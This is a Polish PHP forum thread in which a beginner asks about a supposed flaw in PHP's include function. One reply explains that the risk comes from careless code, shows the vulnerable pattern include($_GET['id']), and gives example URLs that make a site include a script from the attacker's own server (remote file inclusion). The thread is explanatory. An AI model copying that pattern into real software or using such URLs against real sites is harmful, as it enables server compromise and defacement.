Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: include
Forum PHP.pl > Forum > PHP
kubatron
czy ktoś wie jaka jest dziura w funkcji include ostatnio czytałem ze hakerzy dzieki odkrytej dziurze w funkcji include hakuja bez problemu stronki :?: :?: :?:
Wankster
php Pro?
Gdzie to wyczytałeś biggrin.gif :?: rolleyes.gif
Seth
php Pro => php

Bledu w includzie nie ma. Jedyny blad jaki mozna wykorzystac to glupota lub niewiedza ludzi piszacych skrypt.
Przykladowo:
link do strony z artykulami wyglada tak www.example.pl/index.php?id=artykuly.php
A w glownym pliku mamy np tak:
[php:1:388bfe2a22]include( $_GET['id'] );[/php:1:388bfe2a22]
lub:
www.example.pl/index.php?id=artykuly
[php:1:388bfe2a22]include( $_GET['id'].".php" );[/php:1:388bfe2a22]

Teraz wystarczy dac np:
www.example.pl/index.php?id=http://www.naszserver.pl/hack.php
czy
www.example.pl/index.php?id=http://www.naszserver.pl/hack


P.S. kubatron: przeczytaj uwaznie regulamin i podpisy pod forami.
kubatron
hacking.pl na tej stronie pisało to o schakowanej stronie dzięki dziurze w include funkcji nieklamie czytałem to i się zdiwiłem bo sie ucze teraz php
zalew
wklejenie linku i cytatu przewyzsza twoje sily questionmark.gif?

edit:
searchem znalalzlem
http://www.hacking.pl/news.php?id=2567
Cytat
Grupa mY tEaM po raz kolejny wykorzystując dziurę w skryptach php podmieniła firmowy serwis internetowy. Jak mówią autorzy ataku: "Po raz kolejny okazuje się ze nieumiejętne używanie funkcji include w php może być niebezpieczne dla całego serwera".


czytaj uwaznie
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.